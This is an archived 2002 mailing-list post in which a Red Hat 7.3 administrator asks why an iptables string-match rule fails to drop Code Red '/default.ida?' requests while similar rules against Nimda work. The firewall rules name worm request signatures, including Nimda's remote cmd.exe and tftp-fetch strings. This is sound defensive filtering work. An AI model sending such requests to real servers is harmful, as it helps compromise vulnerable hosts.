Filtering Code Red with Iptables & RH 7.3

From: Stevemeister (spamfree@area51.org)
Date: 06/16/02

Next message: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
Previous message: Ian Jones: "Re: RedHat security"
Next in thread: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
Reply: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: Stevemeister <spamfree@area51.org>
Date: Sat, 15 Jun 2002 21:24:24 -0600

Hi everyone,

I'm running a small network with a dedicated firewall box running Red
Hat 7.3, two network cards, and an Iptables firewall ruleset by David
Ranch. I have a separate external www server on the local LAN running
Red Hat 7.3 and Apache. Everything works fine (port forwarding, DHCP,
Iptables, etc.). The problem is that my Apache server logs are being
overwhelmed by Code Red/Nimda requests. I know that these hits are
harmless to Linux, but they consume bandwidth and tend to render Website
statistics useless. The kind folks over in alt.apache.configuration
have come up with some nice solutions which redirect direct requests to
separate log files, but this doesn't eliminate the thousands of 404
replies which chew up limited bandwidth. So I have been looking for an
Iptables solution instead. I ran across the following article, whose
solution totally filtered my Nimda problem:

http://www.samag.com/documents/s=1824/sam0201h/0201h_s1.htm

But the requests for "default.ida" (Code Red?) continue. Here's the
code I added to my firewall ruleset:

# DROP HTTP packets related to CodeRed and Nimda
# viruses silently
$IPTABLES -t filter -A INPUT -i $EXT_IFACE -p tcp \
   -d $EXTIP --dport 80 -m string \
   --string "/default.ida?" -j DROP
$IPTABLES -t filter -A INPUT -i $EXT_IFACE -p tcp \
   -d $EXTIP --dport 80 -m string \
   --string ".exe?/c+dir" -j DROP
$IPTABLES -t filter -A INPUT -i $EXT_IFACE -p tcp \
   -d $EXTIP --dport 80 -m string \
   --string ".exe?/c+tftp" -j DROP

I'm not sure why this doesn't work for the first rule, as the second and
third rule work effectively. I've also tried changing the --string to
"default.ida", "NNNNNNNNNN", etc. but no joy. Anyway, sorry for the
long post. Any suggestions would be appreciated.

Thanks in advance

Stevemeister

Next message: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
Previous message: Ian Jones: "Re: RedHat security"
Next in thread: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
Reply: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Filtering Code Red with Iptables & RH 7.3
... Hat 7.3, two network cards, and an Iptables firewall ruleset by David ... Red Hat 7.3 and Apache. ...
(comp.os.linux.security)
Re: firewall
... John Dangler wrote: ... to put the firewall ruleset in /etc/sysconfig/iptables in order for ... iptables rules to be loaded when the system reboots, ... should I create that directory and put the ruleset file in ...
(Ubuntu)
Re: iptables put millions lines to dmesg
... These are put in dmesg by the LOG target in IPTables. ... Remove any logging ... rules in your firewall ruleset to eliminate them. ...
(Debian-User)
firewall
... iptables working. ... According to the instructions given there, ... to put the firewall ruleset in /etc/sysconfig/iptables in order for ... iptables rules to be loaded when the system reboots, ...
(Ubuntu)
iptables on startup?
... my iptables working. ... According to the instructions given there, ... to put the firewall ruleset in /etc/sysconfig/iptables in order for ... iptables rules to be loaded when the system reboots, ...
(Ubuntu)